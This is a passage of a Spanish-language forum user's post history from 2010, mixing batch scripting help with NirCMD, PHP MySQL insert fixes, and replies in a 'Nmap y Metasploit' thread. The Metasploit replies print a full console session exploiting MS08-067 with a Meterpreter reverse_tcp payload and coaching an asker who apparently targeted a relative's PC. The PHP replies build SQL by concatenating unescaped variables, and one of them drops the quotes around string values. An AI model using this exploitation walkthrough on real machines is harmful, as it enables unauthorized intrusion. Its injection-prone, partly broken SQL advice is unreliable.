|
3601
|
Programación / Scripting / Re: Problema con .bat
|
en: 7 Enero 2010, 22:11 pm
|
Lo sabia!, Se puede usando NirCMD Ejemplo: Codigo y Explicación de Leo Gutierrez.@echo off cd "%programfiles%\internet explorer" start "" iexplore.exe http://biboz.net/boton-rojo/ nircmd win activate ititle "Pulsa el boton rojo" nircmd wait 1000 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey 0x09 press nircmd wait 100 nircmd sendkey enter press Breve explicacion del code : nircmd win activate ititle "Pulsa el boton rojo" Con eso traigo adelante la ventana del Iexplore. Con eso espero 1 segundo, esta en milisegundos, puedes modificarlo a tu gusto. nircmd sendkey 0x09 press Con eso simulo la tecla TAB nircmd sendkey enter press Saludos!
|
|
|
3603
|
Programación / Bases de Datos / Re: Insert Mysql [PHP]
|
en: 7 Enero 2010, 20:58 pm
|
perdon no me lo vas a creer pero me funciono faltaba tan solo 1 parentesis jajajaj Seee Error comun... xD gracias por tu ayuda me alegraste el dia jajaja no hay de qué... Saludos!
|
|
|
3604
|
Programación / Scripting / Re: Problema con .bat
|
en: 7 Enero 2010, 20:56 pm
|
pero que pone la pantalla?
No es una pantalla es un MsgBox o Msg * en Batch. Supongo que dice, "Actualizacion Completa". Pues de Batch nose mucho, averigua si se puede mandar una Tecla {Enter} ó {Intro}. vease SendKeys. Saludos!!!
|
|
|
3605
|
Programación / Bases de Datos / Re: Insert Mysql [PHP]
|
en: 7 Enero 2010, 20:52 pm
|
es que copie y pege mal $consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$tema.','.$totalm.',"'.$autor.'","'.$mensaje.'"'); o sea en la consola mysql la uso asi INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES (1,3,"Ari-Slash","Hola");
Intenta Así: $consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$tema.','.$totalm.','.$autor.','.$mensaje.')');
PD1: No olvides cerrar los ( )PD2: Id = Tema? Pwned! Saludos!
|
|
|
3606
|
Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit
|
en: 7 Enero 2010, 20:49 pm
|
Como es posible si NMAP me dice que es vulnerable a eso -.- A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No? Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme. No te rindas... . Nada es Imposible... Saludos!
|
|
|
3607
|
Programación / Bases de Datos / Re: Insert Mysql [PHP]
|
en: 7 Enero 2010, 20:44 pm
|
bueno esta consulta $consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) si la pruebo en la consola de mysql anda bien, o sea funciona, 1. Donde estan los Parametros 2. Verifica el inicio y finalizacion de las comillas simples Ejemplo: Creo que es así... :·P hace rato que no uso PHP$consulta = mysql_query('INSERT INTO mensajes (id,numero,autor,cuerpo) VALUES ('.$id.', '.$Numero.', '.$Autor.', '.$Cuerpo.')')
Saludos!
|
|
|
3608
|
Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit
|
en: 7 Enero 2010, 20:42 pm
|
mira bien las ip.. No tiene nada que ver, mira. | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 28 days hago (2009.12.10) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2RHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2LHOST => 192.168.0.2 msf exploit(ms08_067_netapi) > exploit - Started reverse handler on port 4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 2 - lang:Spanish
- Selected Target: Windows XP SP2 Spanish (NX)
- Triggering the vulnerability...
- Sending stage (723456 bytes)
- Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]
meterpreter >
Saludos!
|
|
|
3609
|
Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit
|
en: 7 Enero 2010, 20:07 pm
|
1. Ingresando RHOST y LHOST iguales, WTF! No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P 2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos! Saludos!
|
|
|
3610
|
Seguridad Informática / Hacking / Re: Ayuda Nmap y Metasploit
|
en: 7 Enero 2010, 19:25 pm
|
cpu2, a ver, 1. RHOST= Host_Remoto; LHOST= Host_Local RPORT= Puerto_Remoto; LPORT= Puerto_Local 2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque? PORT STATE SERVICE 6551/tcp open bittorrent-tracker Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose... Saludos!
|
|
|
|
|
|
|